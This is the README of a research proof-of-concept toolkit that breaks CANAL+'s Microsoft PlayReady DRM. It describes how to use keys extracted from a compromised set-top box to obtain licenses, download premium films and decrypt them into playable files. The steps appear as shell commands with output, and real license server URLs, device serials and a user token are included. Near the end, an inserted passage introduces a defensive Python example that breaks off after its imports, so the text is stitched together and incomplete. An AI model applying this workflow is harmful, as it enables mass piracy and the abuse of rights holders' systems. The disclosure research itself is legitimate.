```
# MS Play Ready / Canal+ VOD toolkit
# (c) Security Explorations 2016-2019 Poland
# (c) AG Security Research 2019-2022 Poland
```

# INTRODUCTION

This Proof of Concept demonstrates weak content protection in the environment of CANAL+ (Microsoft PlayReady DRM case).

The goal of this research is not to promote PayTV piracy in any way. It is to both increase awareness and trigger more work on the part of the vendors involved to make PayTV piracy harder to accomplish. The results obtained indicate that there is much space for improvement through better technical means.

# BASE RESEARCH

The POC exploits 3 year old vulnerabilities in CANAL+ STB devices, which make it possible to gain code execution access to target STB devices over an IP network. Full technical details of the vulnerabilities along with POC codes were published in 2019 (SRP-2018-02 project). These demonstrated the following, among others:

- fully privileged runtime access to set-top-box SW (middleware, kernel),
- compromise of the ST DVB chipset (and its keys),
- compromise of ADB DRM key storage.

The said details can be found in the SRP-2018-02-report.pdf file included as part of this research.

# RATIONALE FOR FURTHER RESEARCH

In 2019, I made a claim that the Microsoft PlayReady content protection mechanism in use by NC+ GO (predecessor of the CANAL+ VOD service) did not matter much in the context of a demonstrated set-top-box compromise. Some of the rationale behind my reasoning was given with respect to several key features of Microsoft PlayReady. Below, the reasons why I believe they do not matter in the context of a full STB compromise are provided:

- Secure License Delivery: license delivery is protected by asymmetric cryptography. Access to the STB makes it possible to issue arbitrary license requests to a license server with the use of a compromised set-top-box RSA key.
- Key Rotation: rotated keys are delivered to the compromised STB device.
- Output Protection: complete control over STB software means any policy restrictions enforced for played content can be bypassed.
- Metering: the count of how many times given content can be played is irrelevant, as it only takes one play to successfully decrypt it / store it to a file for later use and/or distribution.
- Breach Response: it is difficult to detect a breach for a device mimicking a completely legitimate one. The detection of a breach may happen at a later time and only if the decrypted content contains watermarks (STB specific watermarks injected at the time of packaging the content). The description of the redGalaxy Coder used by a 3rd party CDN does not mention support for watermarking; the watermarking app is likely used solely on the STB.

Since MS PlayReady technology was used to protect premium content in the environment of a SAT TV provider, I inquired with Microsoft in order to learn whether MS PlayReady could be impacted in any way by my research (whether it could provide any content protection in case of a demonstrated, complete STB compromise). The following questions were sent to Microsoft in order to learn whether its technology could be affected by a security vulnerability in the underlying ST chipset (among others):

- has MS PlayReady technology been used properly in the environment of the NC+ SAT TV operator to protect PayTV content of premium content providers such as HBO, Disney and Canal+?
- does MS PlayReady provide proper (any) security of content if the underlying set-top-box chipset (such as STi7111) is compromised (its keys are compromised)?
- will Microsoft allow continued use of MS PlayReady technology in the environment of NC+ and / or the ITI-2851ST set-top-box device?
- did NC+ or the set-top-box vendor (ADB) violate any agreement signed with Microsoft regarding the use of MS PlayReady technology?

I received no response from Microsoft.

In Mar 2022, I discovered that no changes had been made to the STB software and associated secrets.
This includes the following:

- no vulnerabilities have been fixed,
- no changes to the PlayReady binary (`libstd_cai_client_drm_msplayready.so`) have been made,
- no certificates have been revoked (PlayReady group cert and private key, STB certificate used to connect to CANAL+ VOD services),
- no changes have been made to the CANAL+ VOD service (same secrets, client side security for content access).

I started to wonder about the reasons for no response / no action from Microsoft in particular. That was unusual, taking into account that Microsoft does a lot to maintain good relationships with the security research community (through private events such as Blue Hat, Bug Bounty programs, etc.). Could it be that there was something I missed in 2019 that Microsoft knew about and that made all my claims invalid / bogus (so that Microsoft didn't care about the impact of the compromise of the STB that PlayReady relied on)? Could Microsoft be so confident of the outstanding security of this technology that the company did not care about a single STB compromise?

The only way to verify that was to investigate the security of the Microsoft PlayReady content protection implementation in the environment of CANAL+.

# BRIEF SUMMARY

It is important to state that the whole research was conducted completely from scratch. Prior to it, no knowledge of the following could be assumed at my end:

- any other DRM or content protection mechanism (such as Widevine, etc.),
- any A/V streaming mechanism used by PayTV / VOD platforms,
- ECC cryptography operation (so far there had been no need for me to learn it, as I usually found other ways to break stuff),
- the MPEG-4 specification along with the role of audio and video codecs in it.

In short, the starting point for the research was the following:

- a compromised STB device (not patched by CANAL+ since 2019, with an over-the-air SW upgrade date of 2022-01-26 10:10:00),
- access to the libstd_cai_client_drm_msplayready.so binary.
The following steps were taken to complete the research (among others):

1. information about PlayReady published by Microsoft was used to gain more insight into the technology (specs, docs),
2. the libstd_cai_client_drm_msplayready.so binary was analyzed in a static manner under IDA Pro (pure, old school reverse engineering),
3. my exploit tool from 2019 was extended to implement dynamic tracing of specific DRM / PlayReady functions (to create traces of given function execution, dump registers and memory content at function entry and / or exit), all done in response to an attempt to play DRM protected content; sample traces are included in this distribution (`reversing/api_traces` directory),
4. the exploit tool was slightly modified to act in a remote fashion and be easier to use (target IP sufficient along with a few params to compromise a box),
5. entry work into ECC crypto was performed with a focus on various ways to optimize its implementation (Montgomery ladder, mappings into spaces, etc.); this resulted in a custom ECC library, which could be used to verify data gathered in steps 1-3,
6. a custom function was implemented to trigger on demand initialization of the DRM client device (to investigate the ECC implementation, implement custom ECC code at the same time, compare results of various functions),
7. a custom command was implemented to fetch plaintext values of certificates and keys used by PlayReady code (group cert, private group key); these were held in an encrypted file system (ordinary fs access fetched encrypted files),
8. a fake DNS / VOD server was used to sniff for HTTP requests to the license server and CDN network (request format, HTTP headers); these servers were embedded into the exploit tool,
9. entry work into the MPEG-4 file format was conducted; this resulted in some custom MPEG-4 file handling (parsing) code, which turned out to be useful to investigate the layout of encrypted fragments too, debug the content of constructed MPEG-4 files, etc.,
10. sample MPEG-4 files published by Microsoft (PlayReady test server samples) were used to see which MPEG-4 boxes were crucial for building fragments into a single, playable MPEG-4 file.

# IMPACT

The research showed that Microsoft PlayReady content security implemented in SW and on the client side constitutes a significant risk for content providers. More specifically, the research proves that one compromised device (compromise of DRM client secrets) is completely sufficient to accomplish that.

The POC illustrates the following (among others):

- the ability to acquire a license to content by spoofing a real STB device or by mimicking a completely fake one,
- the ability to download premium content from the Canal+ CDN, decrypt it and build a single movie file ready to watch (or distribute over the Internet),
- a bad approach to PlayReady integration with the STB device (no use of hardware capabilities, no isolation of DRM secrets from STB application code),
- that no watermarking is implemented on the CANAL+ / CDN side.

The real case of CANAL+ shows that their database of movies containing more than 18k assets (including HBO, CANAL+, FOX libraries) could be compromised.

Finally, several issues have been identified in the operation of the PlayReady licensing mechanism.

# TOOL DESCRIPTION

The tool makes use of several modules to implement specific functionality.
These are the following:

- `cdn` - the module for acquiring data from a Content Delivery Network (CDN)
- `mspr` - base module implementing Microsoft PlayReady functionality such as Manifest parsing, device certificate generation, license request and response generation, license acquisition, MPEG-4 file format parsing and building, and encrypted file decryption
- `vod` - the module enabling browsing of the CANAL+ library and acquisition of the asset information needed by the `mspr` module
- `cgaweb` - the module implementing basic functionality illustrating issues related to the CANAL+ VOD ordering service

Each module is initialized with the help of an `Init` class. This class contains information about the commands implemented by the module. As such, the `Init` class should be treated as the initial code location whenever a specific module command implementation needs to be investigated.

## DIRECTORY STRUCTURE

The tool follows the directory structure described below:

- `content` - the base directory for content assets; each subdirectory represents a content asset
- `content\someassetid` - the asset directory containing base information about a given asset (manifest url, license server url, audio and video fragments)
- `secrets` - the directory holding secrets acquired from a vulnerable set-top-box device
- `src` - main source code directory
- `src\mod` - directory where source code for tool modules can be found
- `classes` - temporary directory where output classes get generated
- `scripts` - the scripts directory

### ASSETS DIRECTORY STRUCTURE

Each asset saved to the local DB follows the structure below.

`DEFINITION FILES`

These are the files which are required to download, obtain a license for and build MPEG-4 files for assets.
- `url.txt` - the file containing the url to the asset manifest file
- `ls.txt` - the file containing the license server url
- `Info.json` - the file containing a description of the asset (title, duration)

`DOWNLOADED FILES`

- `Manifest.ism` - the manifest file for this asset
- `audio\*AUDIONAME*\q*LEVEL*` - directory where encrypted audio data fragments for audio track *AUDIONAME* and quality level *LEVEL* get downloaded
- `video\q*LEVEL*` - directory where encrypted video data fragments for quality level *LEVEL* get downloaded
- `debug` - directory where the license server request and response are stored for inspection (`getlicense` command)

## BUILDING

The tool was developed in the Java language. As such it requires a Java compiler and Java language runtime for building (compilation) and execution.

Prior to that, the `config.bat` file needs to be edited so that the `javadir` variable points to the directory location where the Java JDK/SDK can be found:

```
@echo off
set javadir="c:\_SOFTWARE\jdk11.0.15_9"
set modules=mspr cdn vod cgaweb
```

Building the toolkit can be done by running the `build.bat` script:

```
c:\_RESEARCH\_CANALP\2022\code>build
*** Compiling source files ***
src\helpers\Web.java:38: warning: MessageHeader is internal proprietary API and may be removed in a future release
public static class CleanMessageHeader extends MessageHeader {
                                                ^
Note: Some input files use unchecked or unsafe operations.
Note: Recompile with -Xlint:unchecked for details.
1 warning
*** Preparing jar files ***
*** cleaning temporary files ***
```

## STARTING

The tool can be started by running the `shell.bat` script:

```
c:\_RESEARCH\_CANALP\2022\code>shell

# MS Play Ready / Canal+ VOD toolkit
# (c) Security Explorations 2016-2019 Poland
# (c) AG Security Research 2019-2022 Poland

loaded cdn [CDN helper]
loaded mspr [MS Play Ready toolkit]
loaded vod [CANALP VOD toolkit]
loaded cgaweb [CANALP CGAWeb toolkit]
```

Upon tool startup, the commands included in the `init.scr` script from the `scripts` directory get automatically executed. The initialization script is used to set several configuration variables and to load tool modules.

## PREDEFINED VARIABLES

The following variables have been implemented by the tool:

- `CONTENT_DIR` - denotes the content directory
- `SERIAL` - denotes the STB serial number
- `MAC` - denotes the STB network MAC address
- `SCARD` - the id of a smartcard (CANAL+ subscriber identifier)
- `SECLEVEL` - MS PlayReady security level used for client certificate and license acquisition
- `VOD_SECRET` - denotes the secret used by the CANAL+ CDN network
- `VOD_URL` - denotes the base url for CANAL+ VOD
- `KSFILE` - Java Key Store file with the STB certificate used to connect to CANAL+
- `KSPASSFILE` - password to the Java Key Store file with the STB certificate used to connect to CANAL+ VOD services
- `MSPR_DEBUG` - indicates that a fixed device identity and certificate is used (fixed random and ECC values in particular)
- `MSPR_LOCAL_LICENSE` - denotes the local file from which to read the license (the license file should be obtained with the use of a fixed identity)
- `MSPR_FAKE_ROOT` - denotes that a custom (fake) certificate chain should be used in place of the group cert file
- `CDN_NOAUTH` - indicates that a random value is used instead of the auth cookie for content data requests (CDN requests)
- `ASSETID` - helper variable used to indicate the asset identifier to use for commands that require it (`-A` argument)

## COMMANDS DESCRIPTION

The list of all commands can be obtained with the use of the `help` command. For each command, brief information about the arguments taken is displayed. Below, more details regarding each command are given:

- show available commands with a brief description of their arguments

```
help [cmd]
```

- redirect shell output to a file (or back to the console)

```
output console|filename
```

- declare a variable of a given name and type

```
var varname str|int
```

- set the value of a given variable

```
set [varname|varname value]
```

- enable / disable echo

```
echo on|off
```

- print a line containing the arguments to the output

```
print arg1 arg2 ... argn
```

- run commands defined in a script file

```
run arg1 arg2 ... argn
```

- check the number of arguments provided to the script or a variable definition; break execution and report an error if the condition is not satisfied

```
assert -a argnum|-v varname [-e errormsg]
```

- load or check the loading status of a given named module

```
mod module
```

- pure test command

```
test arg
```

- issue a `HEAD` HTTP request for a given URL and inspect the returned headers

```
urlcheck url
```

- issue a `GET` HTTP request for a given URL and download the returned data to a file

```
urlfetch url outputfile
```

- print device identity information

```
device
```

- print the Microsoft PlayReady private ECC group key

```
grpkey
```

- print the Microsoft PlayReady group certificate

```
grpcert
```

- print the Microsoft PlayReady device identity certificate

```
devcert
```

- print the Microsoft PlayReady device identity certificate chain (the one used for license acquisition)

```
devchain
```

- show information from the manifest file of a given asset id (MPEG-4 streams and codec information, content protection information such as key id and algorithm)

```
maninfo [-A assetid]
```

- issue a `HEAD` HTTP request for a manifest URL and inspect the returned headers

```
urlinfo [-A assetid]
```

- get a license for a given asset id and obtain the content key; this can be done by issuing a license request to the license server or by loading a license server response from a file (`MSPR_LOCAL_LICENSE` variable)

```
getlicense [-A assetid]
```

- build a standalone MPEG-4 file from the fragments downloaded for a given asset id; the fragments get decrypted with the use of the content key, the audio and video stream parameters specify the quality to use, the time description specifies the start and end time (in seconds) for the created file

```
makemp4 [-A assetid] -a audiostream -v videostream -t timedesc
```

- download fragments for a given asset id; the fragments get downloaded with respect to the audio and video stream parameters specifying quality, the time description specifies the start and end time (in seconds) for the download

```
downmp4 [-A assetid] -a audiostream -v videostream -t timedesc
```

- show information about a given asset (id, title, manifest and license server urls)

```
assetinfo [-A assetid]
```

- dump information from a given MPEG-4 file; the `-b` argument denotes the box path to limit the dump to

```
mp4dump [-f file][-v][-b path]
```

- show (and verify the status of) the secrets used by the toolkit

```
secrets
```

- dump information from a binary PlayReady certificate

```
bcertinfo bcertfile
```

- show the available collections in CANAL+ VOD

```
vodinfo
```

- show information about a given CANAL+ VOD collection

```
colinfo coluniqueid
```

- list assets available in a given CANAL+ VOD collection; the `pagecnt` argument limits the number of pages to list the assets from (0 is for all assets)

```
lscol coluniqueid [pagecnt]
```

- print information about a given collection asset

```
colasset assetid
```

- store basic information about a given asset (manifest url, license server url and JSON info file) in the content directory for use by other commands (such as `maninfo`, `getlicense`, `downmp4` and `makemp4`)

```
storeasset assetid
```

- check whether CDN content is watermarked; for the purpose of the check, access to CDN data is made with the use of different device identifiers, the `fragment_idx` param indicates the fragment to verify, `quality` is the index of the stream

```
checkwatermark [-A assetid][-i fragment_idx][-q quality]
```

- extract MS PlayReady secrets from the main binary with the use of a device root key (compromised root key)

```
extractsecrets playreadybinary
```

## SAMPLE USE (PROBLEMS ILLUSTRATION)

Below, several scenarios are provided that demonstrate weak content protection in the environment of CANAL+ (Microsoft PlayReady DRM case).

### SCENARIO 1 (STB SECRETS SUFFICIENT FOR STEALTH PIRACY OF CONTENT)

The following commands illustrate the scenario where a PlayReady license for an arbitrary movie from the CANAL+ VOD library can be obtained and the movie (or its designated part) downloaded in plaintext to a single, ready to play (or to distribute over the Internet) file.

- check the status of the secrets acquired from the STB

```
msprcp> secrets
z1 - PlayReady private group key [OK]
g1 - PlayReady group certificate [OK]
stb-cert.jks - set-top-box certificate [OK]
stb-cert.pwd - set-top-box certificate password [OK]
```

- browse the CANAL+ VOD library

```
msprcp> vodinfo
[VOD LIBRARY]
COL01 "PREMIERY VOD+"
[Film]
COL02 "CANAL+ Premium"
COL03 * "ALE KINO+"
COL04 "Movies Fun"
COL05 "FOX PLAY"
COL06 "FilmBox Live"
COL07 "AXN NOW"
COL08 "KINO ŚWIAT"
COL09 * "ROMANCE TV"
COL0a * "NOVELAS+"
COL0b "EPIC DRAMA"
COL0c * "KINO POLSKA"
COL0d "SUNDANCE TV"
COL0e * "TVN"
COL0f "SCIFI"
COL10 * "13 ULICA"
COL11 "BBC FIRST"
COL12 "KINO TV"
COL13 "AMC"
COL14 "Warner TV"
COL15 * "BBC PLAYER"
COL16 "COMEDY CENTRAL"
COL17 "POLSAT COMEDY CENTRAL EXTRA"
COL18 "CBS EUROPA"
COL19 "FOX"
COL1a "CANAL+ SERIALE EXTRA"
COL1b "HBO"
[Dzieci]
COL1c * "BAJKI PO UKRAIŃSKU"
COL1d "CANAL+ Kids"
COL1e * "MINIMINI+"
COL1f "TeenPlay"
COL20 * "TELETOON+"
COL21 "DISNEY CHANNEL"
COL22 "DISNEY JUNIOR"
COL23 "DISNEY XD"
...
[4K]
COL4e "PREMIERY VOD+ 4K"
COL4f "CANAL+4K"
COL50 "BBC Studios"
COL51 "BBC EARTH 4K"
```

Collections marked with the `*` character are those which the defined smart card value (`SCARD` variable) is allowed to access.

- show information about a kids (Dzieci) movie collection

```
msprcp> lscol COL1e 2
ASSETS from 2/74 pages
ctitmim568003 "Barbie: Akademia Księżniczek"
ctitmim597698 "Barbie: Delfiny z Magicznej Wyspy"
ctitmim603561 "Barbie: Dreamhouse Adventures 2 odc. 10"
ctitmim604164 "Barbie: Dreamhouse Adventures 2 odc. 11"
ctitmim602516 "Barbie: Dreamhouse Adventures 2 odc. 2"
ctitmim602553 "Barbie: Dreamhouse Adventures 2 odc. 3"
ctitmim602563 "Barbie: Dreamhouse Adventures 2 odc. 4"
ctitmim602585 "Barbie: Dreamhouse Adventures 2 odc. 5"
ctitmim602791 "Barbie: Dreamhouse Adventures 2 odc. 6"
ctitmim602977 "Barbie: Dreamhouse Adventures 2 odc. 7"
ctitmim603541 "Barbie: Dreamhouse Adventures 2 odc. 8"
ctitmim603550 "Barbie: Dreamhouse Adventures 2 odc. 9"
ctitmim577795 "Barbie: Dreamhouse Adventures odc. 1"
ctitmim579295 "Barbie: Dreamhouse Adventures odc. 10"
ctitmim577831 "Barbie: Dreamhouse Adventures odc. 11"
ctitmim577835 "Barbie: Dreamhouse Adventures odc. 12"
ctitmim578208 "Barbie: Dreamhouse Adventures odc. 13"
ctitmim578209 "Barbie: Dreamhouse Adventures odc. 14"
...
ctitmim529714 "Bing - 33 - Buu"
ctitmim529719 "Bing - 34 - Mówi taxi"
ctitmim529722 "Bing - 35 - Latawiec"
ctitmim529730 "Bing - 36 - Więcej"
ctitmim529732 "Bing - 37 - Czarodziejski blask"
ctitmim529720 "Bing - 38 - Drzewo"
ctitmim529723 "Bing - 39 - Gdzie jest Flop?"
ctitmim529744 "Bing - 40 - Śniadaniówka"
ctitmim531739 "Bing - 41 - Nocowanie"
```

- show information about collection asset `ctitmim529714`

```
msprcp> colasset ctitmim529714
ctitmim529714 "Bing - 33 - Buu"
link: https://nvs1.ncplus.pl/go-stb/static/stb_content.json?productId%3D529714
ls_url: https://lsp1.ncplus.pl/kms/proxy
```

- store information (manifest and license server url) about asset `ctitmim529714` in the local DB

```
msprcp> storeasset ctitmim529714
asset data stored to: content\ctitmim529714
```

- show asset `ctitmim529714` information as visible in the local DB

```
msprcp> assetinfo -A ctitmim529714
ASSET
id: ctitmim529714
title: Bing - 33 - Buu
title_original: Bing - 33
allow: 30.11.2022
year: 2014
duration: 7 min
url: http://r.cdn-ncplus.pl/ncplusgo04-voddrm01/MiM_74011213/MiM_74011213.ism/Manifest
```

- show manifest information for asset `ctitmim529714`

```
msprcp> maninfo -A ctitmim529714
MANIFEST: content\ctitmim529714\Manifest.ism
SmoothStreamingMedia
MajorVersion: 2
MinorVersion: 0
TimeScale: 10000000
Duration: 4400000000 [0h 7m 20s]
ProtectionHeader
SystemID: 9A04F079-9840-4286-AB92-E65BE0885F95
WRMHEADER
keylen: 16
algid: AESCTR
kid
0000: 04 25 01 44 01 78 12 4f a5 51 56 ca f9 7a 2f f5  .%.D.x.O.QV..z/.
la_url: https://api-ncplus.drm.insyscd.net/rightsmanager.asmx
ds_id:
0000: 79 f0 04 9a 40 98 86 42 ab 92 e6 5b e0 88 5f 95  y...@..B...[.._.
StreamIndex
Type: audio
Name: Oryginalny
TimeScale: 10000000
Chunks: 220
QualityLevels: 1
Url: QualityLevels({bitrate})/Fragments(Oryginalny={start time})
QualityLevel
Index: 0
Bitrate: 125417
FourCC: AACL
CodecPrivateData: 1190
SamplingRate: 48000
Channels: 2
BitsPerSample: 16
PacketSize: 4
AudioTag: 255
StreamIndex
Type: audio
Name: Polski
TimeScale: 10000000
Chunks: 220
QualityLevels: 1
Url: QualityLevels({bitrate})/Fragments(Polski={start time})
QualityLevel
Index: 0
Bitrate: 125418
FourCC: AACL
CodecPrivateData: 1190
SamplingRate: 48000
Channels: 2
BitsPerSample: 16
PacketSize: 4
AudioTag: 255
StreamIndex
Type: text
Name: text-1
TimeScale: 10000000
Chunks: 8
QualityLevels: 1
Url: QualityLevels({bitrate})/Fragments(text-1={start time})
StreamIndex
Type: video
Name: video
TimeScale: 10000000
Chunks: 220
QualityLevels: 5
Url: QualityLevels({bitrate})/Fragments(video={start time})
QualityLevel
Index: 0
Bitrate: 400000
FourCC: AVC1
CodecPrivateData: 000000016742C015D901E08FEB01100000030010000003032E200030D400086478A8C01E2C5C900000000168CB8DC8
MaxWidth: 480
MaxHeight: 270
```

- get a license for asset `ctitmim529714`

```
msprcp> getlicense -A ctitmim529714
-- loading cached manifest
-- generating license req
XML key (AES/CBC)
iv
0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5  Hi......0.,.].n.
key
0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a  W|y.........'...
nonce
0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34  mQ(*.....4/...E4
NONCE bVEoKtjFGqfMNC8DHIlFNA==
KEYDATA /3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A=
XML DIGEST HVyLLu1ogxnqzip5Tx6wf5uzEB/XxUoeZRY0cTdAmlA=
ecdsa digest
0000: 7e c1 ad 61 42 71 9a 25 9d 90 9a f0 48 c5 c3 44  ...aBq.%....H..D
0010: e6 9c 60 da 98 ec 78 3b 21 6e 9c 1c dd 33 e3 96  ......x;!n...3..
signature
-- r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6
-- s: 607e500df0bc09ce890110d9f6d214ecb2d6027268ea9135f9a66d44e778c7b1
XML SIGNATURE J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqZgflAN8LwJzokBENn20hTsstYCcmjqkTX5pm1E53jHsQ==
PUBKEY HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ==
-- sending license req to: https://lsp1.ncplus.pl/kms/proxy
LICENSE
CUSTOM DATA
UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb
BrandGuid: 448ab54c-d127-45f6-b651-4c59aee2f431
LicenseType: NonPersistent
BeginDate: 2022-06-27T10:29:41.2331761
ExpirationDate: 2022-06-29T10:29:41.2331761
ErrorCode: 0
TransactionId: auto:56
XMR LICENSE
version: 3
attr: 0001 OuterContainer
attr: 0036 Unknown
data
0000: 00 00 00 39 00 00 00 18 d8 27 66 78 a6 c2 be 44  ...9.....'fx...D
0010: 8f 88 08 ae 25 5b 01 a7                          ....%[..
attr: 0002 GlobalContainer
attr: 000d Unknown
data
0000: 00 01                                            ..
attr: 0032 DWORD_Versioned
data
0000: 00 00 00 40                                      ...@
SecurityLevel
level: SL2000
attr: 0009 KeyMaterialContainer
ContentKey
key_id
0000: 04 25 01 44 01 78 12 4f a5 51 56 ca f9 7a 2f f5  .%.D.x.O.QV..z/.
v1: 1
v2: 3
enc_data_len: 0080
enc_data
0000: 4d 6e 63 6a 80 5d ea a2 20 e4 5f dc 1b 3a b8 07  Mncj.]...._..:..
0010: 84 c5 d5 0c 91 37 69 6e 94 71 b6 0c 1a 20 f0 de  .....7in.q......
0020: 24 79 38 8a 04 b0 02 e8 d2 4c fb 19 4d 24 b5 7e  $y8......L..M$..
0030: e5 08 12 f3 28 46 76 82 43 13 34 20 d3 01 15 61  ....(Fv.C.4....a
0040: 03 04 71 a9 19 a5 98 c3 43 67 42 1e 5a 50 5e 8c  ..q.....CgB.ZP^.
0050: ac bf b4 c6 af b6 6d 58 7a c9 7a 3d 41 a2 d0 cb  ......mXz.z=A...
0060: dd 76 04 fd b5 02 2c 07 11 65 d6 53 0f 03 5c 66  .v....,..e.S...f
0070: e2 45 09 eb 0b 49 e2 db 99 9a d7 44 ce aa 8e e5  .E...I.....D....
attr: 002a ECCDeviceKey
data
0000: 00 01 00 40 d2 96 26 1e 5f 0b f2 4c c0 73 4d 76  ...@..&._..L.sMv
0010: c8 10 ac ef 7b 49 2c 16 04 07 8a 51 9c 6f 54 58  ....{I,....Q.oTX
0020: 6c bf be df ea a2 6c f7 29 cc 0f 74 75 d2 20 bd  l.....l.)..tu...
0030: cf 64 fa 69 fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5  .d.i.....f......
0040: 70 df ca 0d                                      p...
attr: 000b Signature
data
0000: 00 01 00 10 46 f5 e0 76 c1 87 f6 89 8d a7 cd e7  ....F..v........
0010: be ad a6 64                                      ...d
content_key
0000: *REMOVED*
```

- download fragments for the time window 0 to 4s of asset `ctitmim529714` (lowest quality 0, audio track `Oryginalny`)

```
msprcp> downmp4 -A ctitmim529714 -a audio=Oryginalny.0 -v video=0 -t 0+4
-- parsing args
audio name: Oryginalny
audio quality: q0
video quality: q0
-- loading cached manifest
start time: 0 sec
duration: 4 sec
Downloading 3 fragments
[###############################]
```

- inspect the contents of MPEG-4 audio fragment 0 of asset `ctitmim529714`

```
msprcp> mp4dump -f content\ctitmim529714\audio\Oryginalny\q0\0
### FILE: content\ctitmim529714\audio\Oryginalny\q0\0
box: 0 MP4 FILE len: 00007f7e
box: 1 moof [Movie Fragment Box] len: 000004d0
box: 0 mfhd [Movie Fragment Header Box]
box: 2 traf [Track Fragment Box] len: 000004b8
box: 3 tfhd [Track Fragment Header Box]
box: 3 trun [Track Fragment Run Box]
box: 3 SampleEncryptionBox [Usertype Box]
box: 1 mdat [Media Data Box]
```

- inspect the contents of the SampleEncryptionBox (AES IV vectors) of MPEG-4 audio fragment 0 of asset `ctitmim529714`

```
msprcp> mp4dump -f content\ctitmim529714\audio\Oryginalny\q0\0 -b moof.traf.SampleEncryptionBox
box: 3 SampleEncryptionBox [Usertype Box] len: 00000308
flags: 00000000
sample_cnt: 0000005e
IV 0000
0000: 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00  ................
IV 0001
0000: 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00  ................
IV 0002
0000: 00 00 00 04 00 00 00 02 00 00 00 00 00 00 00 00  ................
IV 0003
0000: 00 00 00 04 00 00 00 03 00 00 00 00 00 00 00 00  ................
IV 0004
0000: 00 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00  ................
...
```

- create a single, plaintext, ready to play MPEG-4 file for the time window 0 to 4s of asset `ctitmim529714` (lowest quality 0, audio track `Oryginalny`)

```
msprcp> makemp4 -A ctitmim529714 -a audio=Oryginalny.0 -v video=0 -t 0+4
-- parsing args
audio name: Oryginalny
audio quality: q0
video quality: q0
-- loading cached manifest
start time: 0 sec
duration: 4 sec
audio track id: 4
video_track_id: 2
-- loading cached content key
Processing (decrypt / append) 3 fragments
[###############################]
total A/V data: 393844
```

The output MPEG-4 file is saved to the `content\ctitmim529714\movie.mp4` file.

- inspect the contents of the generated `movie.mp4` file

```
msprcp> mp4dump -f content\ctitmim529714\movie.mp4
### FILE: content\ctitmim529714\movie.mp4
box: 0 MP4 FILE len: 00060730
box: 1 ftyp [File Type Box]
box: 1 moov [Movie Box] len: 0000049c
box: 2 mvhd [Movie Header Box]
box: 2 trak [Track Box] len: 000001be
box: 3 tkhd [Track Header Box]
box: 3 mdia [Media Box] len: 0000014e
box: 4 mdhd [Media Header Box]
box: 4 hdlr [Handler Reference Box]
box: 4 minf [Media Information Box] len: 000000f4
box: 5 smhd [Sound Media Header Box]
box: 5 dref [Data Reference Box]
box: 5 stbl [Sample Table Box] len: 000000b8
box: 6 stts [Decoding Time to Sample Box]
box: 6 ctts [Composition Time to Sample Box]
box: 6 stsc [Sample To Chunk Box]
box: 6 stsz [Sample Size Boxes]
box: 6 stco [Chunk Offset Box]
box: 6 stsd [Sample Description Box]
box: 2 trak [Track Box] len: 000001fa
box: 3 tkhd [Track Header Box]
box: 3 mdia [Media Box] len: 0000018a
box: 4 mdhd [Media Header Box]
box: 4 hdlr [Handler Reference Box]
box: 4 minf [Media Information Box] len: 00000130
box: 5 smhd [Sound Media Header Box]
box: 5 dref [Data Reference Box]
box: 5 stbl [Sample Table Box] len: 000000f4
box: 6 stts [Decoding Time to Sample Box]
box: 6 ctts [Composition Time to Sample Box]
box: 6 stsc [Sample To Chunk Box]
box: 6 stsz [Sample Size Boxes]
box: 6 stco [Chunk Offset Box]
box: 6 stsd [Sample
Description Box]
box: 2 mvex [Movie Extends Box] len: 00000054
box: 3 mehd [Movie Extends Header Box]
box: 3 trex [Track Extends Box]
box: 3 trex [Track Extends Box]
box: 1 moof [Movie Fragment Box] len: 000004d0
box: 0 mfhd [Movie Fragment Header Box]
box: 2 traf [Track Fragment Box] len: 000004b8
box: 3 tfhd [Track Fragment Header Box]
box: 3 trun [Track Fragment Run Box]
box: 3 uuid_28632920414753656352657332303232 [Usertype Box]
box: 1 mdat [Media Data Box]
box: 1 moof [Movie Fragment Box] len: 000007e6
box: 0 mfhd [Movie Fragment Header Box]
box: 2 traf [Track Fragment Box] len: 000007ce
box: 3 tfhd [Track Fragment Header Box]
box: 3 trun [Track Fragment Run Box]
box: 3 uuid_28632920414753656352657332303232 [Usertype Box]
box: 1 mdat [Media Data Box]
...
```

### SCENARIO 2 - NO WATERMARKING FOR CDN CONTENT

The CDN serves static, encrypted content. There is no watermarking implemented by it, as indicated by the following toolkit test:

```
msprcp> checkwatermark
-- loading cached manifest
-- downloading video fragment 0
url: http://n-15-22.dcs.redcdn.pl/webcache/canalplus/ncplusgo04-voddrm01/MiM_54018035/MiM_54018035.ism/QualityLevels(400000)/Fragments(video=0)
download res for serial DGBD18304072851C9 : 86313 bytes
download res for serial DGBD9C15827040381 : 86313 bytes
-- same data [LIKELY NO WATERMARK]
```

The above command fetches an arbitrary video fragment with the use of different serial numbers. The CDN returns the same content for requests mimicking different STB devices.

### SCENARIO 3 - WEAK AUTH FOR CONTENT DOWNLOAD

One of the requests used in Scenario 2 was issued with the use of a fake STB serial number (the original serial "reversed"). This implies weak authentication for content access.
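The weak authorization observed in Scenario 3 (a fake serial accepted by the CDN) and the missing synchronization with the license server in Scenario 4 below have a common cause: the CDN does not bind a fragment request to a specific device and a specific, still valid license. The Python below is an added example, not part of this toolkit or of the CANAL+ service, that contrasts the observed "any cookie value is accepted" check with a check of an HMAC token minted at license grant time and bound to the STB serial, the asset id and the license expiry. The token format, the secret, the serial number and the timestamps are constructed for the example; the real `VOD_SECRET` and the `X-nBox-Code` algorithm are not known from this README and are not reproduced.

```python
import base64
import binascii
import hashlib
import hmac
from dataclasses import dataclass

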